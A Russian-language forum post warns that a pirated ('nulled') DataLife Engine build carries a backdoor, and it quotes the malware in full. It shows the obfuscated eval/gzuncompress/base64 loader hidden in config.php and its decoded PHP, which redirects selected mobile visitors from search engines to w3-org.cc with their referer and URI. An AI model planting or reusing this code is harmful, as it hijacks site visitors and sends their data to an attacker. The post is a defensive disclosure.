Расшифрованный заражённый DLE

slva2000

slva2000

Созидатель (II)
Сообщения
5
Симпатии
6
Баллы
42
То, "нулённое", что распространяется на некоторых упомянутых здесь сайтах, имеет встроенный бэкдор, в частности, его задача собирать куки посетителей вашего сайта и отправлять их хакеру по адресу: https://w3-org.cc/check/this/tmp.cgi с параметрами

Тема на сегодня живая и рабочая, просто рекомендую всем это понимать и помнить (сам намотал :blush:)

Оригинал:
config.php (dbconfig.php | classes/mysql.php):

PHP: 
"@Ev"."aL(gZu"."ncOmp"."rEss(bAs"."e64"."_Dec"."odE('eF6dVG1P2zAQ/itFqnAiWFoorEAVjYGqDW3aC5ShaUORE18Tr4md2Q4d2vHfd06YCgh10j7EZ9/7c3e5vq1kGbOE9SKWNP60YNqH9KdI2ETOA2ktuKCfnH78+O5s+q3vja7D8PcxsTOtFxKClrf9RGVrZ9vJCoJw62D/cH+8zQYsnNyRw+D4iWYcs8PdvfFwND5goTZr5Ifr5QfDf8h32HOJs+FouDfeP9wbj9gq54Pxfpdz38xjcnkxPf8yPf9mnTFwExBxuqlrMAEzYGAOJqmdKyjA9aTfGPnAhJ1PP19OL2bJ5fkZIylpr3coTZM4C81Paof3d9wvtI3XWTiri1X8Argg7r0eG72SeRbVlfNdHVhZuIG/LTIospaVZZGnudGevBgtW+7gyNatiSt6R0q3M+F4a6Hfs5DIpgXdDgwBImL4sjElqEwLKq2Ztyo1N7wCByb+3l/A7VIbQWb0sLDZmHiH7J7BEz+s6SaBeuKdFc7VRwOPw9eGTlIPwwn8km5y9z8ds/l6E6cg54kB26ys/DBvrNr8djb7lFzSK3n9Zvphxq79MK4R01y287pRG8iTirusCNgg5VI0mBFW5IXWKPOK44l2WEtqKvIqLQG/8hOjl0g1ocfV6DTBaen4mcKrHBxyJeAXSp5wkxWodU5KKXmouCyjgWTbHm5IvwIBeBS7NYw6PYNSWcdziquofdjl1bgmBTqj9LbLTAulF9iUOsc5zyDVEepFZBq8WUSZ7oJHKJps4T+0OtcN2gIU2Sp+4xHpMso6XAaX0vlgFtrUb30FKB+rSIP+1V00aRZhKlXe4aAha1E8hlFHKVWHlhnqVBL2H7sV4G2VSq7QEtUWlTBaCqykqBGMBPu993KIhcsS4imJdaEVrEpFhQk2nmxCJkpIGoqSSEG9flbn77ZsZY9yjLkQCpYWqXJSRXVRIxfV/Y3GP5fWFyKeA4iUU+Xi0pfOdVokNNxJrboUjexC+FtvI+75vfXcortfo+MHa261mu/u/gBRtwuW')));";$release_this = "cre"."ate_"."function";if (@function_exists($release_this)){@$dle_func = $release_this('', "$liciens;");$dle_func('');}

Декод:

PHP: 
if (isset($_COOKIE['__user_id_'])) {
    setcookie('__user_id_', $_COOKIE['__user_id_'] + 1, time() + 85957, '/');
}
if ($_COOKIE['__user_id_'] == '92470378' or  $_COOKIE['__user_id_'] == '92470379' or $_COOKIE['__user_id_'] == '92470380' or  $_COOKIE['__user_id_'] == '92470381') {
    setcookie('__user_id_', '0304759473', time() + 85875, '/');
    $rf = $_SERVER['HTTP_REFERER'];
    $uri = $_SERVER['REQUEST_URI'];
    $ref = $_SERVER['REQUEST_URI'];
    $hos = $_SERVER['HTTP_HOST'];
    header('Location: https://w3-org.cc/check/this/tmp.cgi?&seoref='.rawurlencode($rf).'&parameter=\$keyword&se=\$se&ur=1'.'HTTP_REFERER'.rawurlencode('http://' . $hos . $ref));
    exit();
}
$rf = $_SERVER['HTTP_REFERER'];
$usg = $_SERVER['HTTP_USER_AGENT'];
if (!$_SERVER['HTTP_USER_AGENT'] or  $_SERVER['HTTP_USER_AGENT'] == '' or !preg_match('/baidu|curl|ahoo|igma|Bot|pider|amble|YaBrow|rawle|W3C_|EltaIn|Wget|andex|ia_arch|oogle|bot|mail./i', $usg))
    {
        if (preg_match('/andex.|mail.r|instag|pinter|baidu|utube|ut.by|igma|odnok|ulog|facebo.|ok.ru|vk.co|oogle.|duckduck|sogou|shenma|naver|aol.c|ambler|witter|search|yahoo.|msn.c|smi2|rbc.|bing./i', $rf))
        {
            if ( preg_match('/p.browser|obile|j2me|ymbian|symbos|ndroid|midp|eries\ 60|htc_|mini|phone/i', $usg ) and !isset($_COOKIE['dle_user_id']) and !isset($_COOKIE['__user_id_']) and preg_match('/=addnews|login.php|admin.php|=register|=feedback|=logout|administration/i', $uri) and $uri != '/')
            {
                @setcookie('__user_id_', '92470377', time() + 85957, '/');
            }
    }
}
 
Последнее редактирование:
Для ответа нужно войти/зарегистрироваться
Назад
Верх